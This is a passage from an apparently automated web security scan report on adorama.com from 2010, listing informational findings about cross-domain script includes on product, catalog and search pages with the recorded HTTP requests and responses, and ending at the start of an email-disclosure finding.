Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 14
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48303

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.4. http://www.adorama.com/CZFPC1DIV.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /CZFPC1DIV.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CZFPC1DIV.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41107

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.5. http://www.adorama.com/GBSLBK.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /GBSLBK.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /GBSLBK.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 18
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60711

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.6. http://www.adorama.com/ICA1DM4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ICA1DM4.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AJAXrefby=become; sterm=; refby=become; header_refby=become; Session_Refby=become

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:08:53 GMT
Connection: close
Set-Cookie: ABFlag=89; expires=Wed, 26-Dec-2040 04:08:51 GMT; path=/
Set-Cookie: sub=; path=/
Set-Cookie: sterm=; path=/
Set-Cookie: refby=; path=/
Set-Cookie: ETjobid=; path=/
Content-Length: 91600

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.7. http://www.adorama.com/ICA1DM4KA.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ICA1DM4KA.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ICA1DM4KA.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
X-Powered-By: PipeBoost/2.1
Server: Microsoft-IIS/6.0
ServerID: 3
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93278

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.8. http://www.adorama.com/ICAACKE4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ICAACKE4.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ICAACKE4.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 8
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41119

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.9. http://www.adorama.com/ICALPE4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /ICALPE4.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ICALPE4.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 15
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47580

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.10. http://www.adorama.com/IDSCFEP8G60M.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /IDSCFEP8G60M.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /IDSCFEP8G60M.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 6
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59944

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.11. http://www.adorama.com/IDSSDX316G.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /IDSSDX316G.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /IDSSDX316G.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60237

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.12. http://www.adorama.com/IMXWP129.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /IMXWP129.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /IMXWP129.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 6
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42994

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.13. http://www.adorama.com/IMXWP179.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /IMXWP179.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /IMXWP179.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42994

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
       
        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.14. http://www.adorama.com/LPRZTLZ20BK.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /LPRZTLZ20BK.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /LPRZTLZ20BK.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 14
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41860

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

        <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.15. http://www.adorama.com/alc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /alc/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /alc/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Pragma: no-cache
Server: Microsoft-IIS/6.0
Expires: -1
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ejs4jy45twoamg45mtedxz45; path=/; HttpOnly
Set-Cookie: sid3=20101225230855189ky; expires=Wed, 26-Dec-2040 04:33:32 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 04:33:32 GMT; path=/
Content-Length: 98406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-- -->

...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language='javascript' src='https://server.iad.liveperson.net/hc/12511569/x.js?cmd=file&file=chatScript3&site=12511569'> </script>
...[SNIP]...

6.16. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /catalog.tpl?op=Process&func=SendGiftCert HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:33 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 36386

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
</form>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.js"></script>
...[SNIP]...

6.17. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /catalog.tpl HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:29 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/;
Set-Cookie: sweeps=T;
Content-Length: 62413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
                   
                   
                                       
...[SNIP]...
<link rel="canonical" href="http://www.adorama.com/"/>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.3.min.js"></script>
...[SNIP]...

6.18. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /catalog.tpl?op=print_details&sku=ICA1DM4 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:34 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 70381

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</p>
       
       
       <script src="http://content.webcollage.net/adorama/smart-button"></script>
...[SNIP]...

6.19. http://www.adorama.com/searchsite/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /searchsite/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /searchsite/default.aspx HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 17
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:31:25 GMT
Content-Length: 27252
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="http://ww
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 8 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

